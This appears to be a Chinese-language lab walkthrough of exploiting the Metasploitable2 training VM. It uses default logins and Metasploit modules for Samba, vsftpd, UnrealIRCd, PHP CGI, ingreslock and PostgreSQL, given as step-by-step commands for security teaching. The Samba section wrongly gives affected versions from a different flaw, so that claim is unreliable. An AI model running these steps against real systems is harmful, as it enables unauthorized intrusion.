Metasploitable2靶机漏洞复现

一、信息收集

nmap扫描靶机信息

 

二、弱口令

1.系统弱口令

在Kali Linux中使用telnet远程连接靶机

 

 输入账号密码msfadmin即可登录

2.MySQL弱口令

使用mysql -h 靶机IP地址即可连接

 

3.PostgreSQL弱密码登录

输入psql -h 192.168.110.134 -U postgres

密码为postgres

输入\q可以退出

 

4.VNC弱口令

 

二、漏洞利用

一下漏洞利用工具基本均为MSF

1.Samba MS-RPC Shell命令注入

此漏洞允许远程攻击者在易受攻击的Samba服务器上上传和执行恶意代码。它影响了Samba版3.5.0到4.6.4（包括在内），并随Samba 4.6.5的发布进行了修补。

1.使用模块

use exploit/multi/samba/usermap_script


2.设置参数

set rhost 靶机IP地址


3.执行

run


4.执行命令查看目录

ls

 

2.vsftpd后门

vsftpd后门漏洞指的是vsftpd（Very Secure FTP Daemon）软件的一个安全漏洞，也被称“Backdoor-VSFTPd”或“vsftpd 2.3.4 Backdoor”。

这个漏洞最初发现于2011年，并影响了vsftpd版本2.3.4。攻击者可以利用该漏洞通过一个特定的用户名进行登录，然后在无需经过认证的情况下获得系统访问权限。

1.MSF中使用以下模块

use exploit/unix/ftp/vsftpd_234_backdoor


2.设置靶机IP

set rhost 靶机IP


3.执行并查看

run

ls

 

3.UnreallRCd后门

UnrealIRCd是一种常见的开源IRC服务器软件，被用于构建IRC（Internet Relay Chat）网络。在过去的几年中，UnrealIRCd曾发现过一个后门漏洞，被称为“UnrealIRCd后门”或“Unreal3.2.8.1Backdoor”。

这个后门漏洞于2010年被公开揭露。攻击者利用这个后门可以在受影响的UnrealIRCd服务器上获取远程执行代码的权限，也可以用于执行各种恶意活动，如监控聊天内容、获取敏感信息等。

1.搜索模块

search unreal ircd


2.搜索payload，并使用一下payload

cmd/unix/bind_perl    


3.设置参数

set rhost 靶机IP地址


4.执行run

 

4.PHP CGI参数注入执行漏洞

PHP CGI 参数注入执行漏洞是一种安全漏洞，它影响在以 CGI 模块方式运行的 Web 服务器上的PHP 程序。该漏洞的根本原因是在使用 CGI 模块处理 PHP 脚本时，未正确过滤和处理用户输入导致的参数注入漏洞。

攻击者利用这个漏洞可以通过特制的 URL 参数注入恶意代码，执行任意的命令或访问系统敏感文件，甚至可能导致服务器完全被入侵控制。

1.搜索模块

srach php_cgi


2.使用模块并设置参数

use exploit/multi/http/php_cgi_arg_injection

set rhost 靶机IP地址


3.执行

run

 

5.Ingreslock后门

Ingreslock后门程序运行在1524端口，连接到1524端口就能直接获得root权限，经常用于入侵一个暴露的服务器；直接使用telnet命令获取权限

 

6.Postgres共享库代码任意执行

1.搜索模块

use exploit/linux/postgres/postgres_payload  


2.设置参数

set rhost 靶机IP

set lhost kali的IP

3.执行参数
run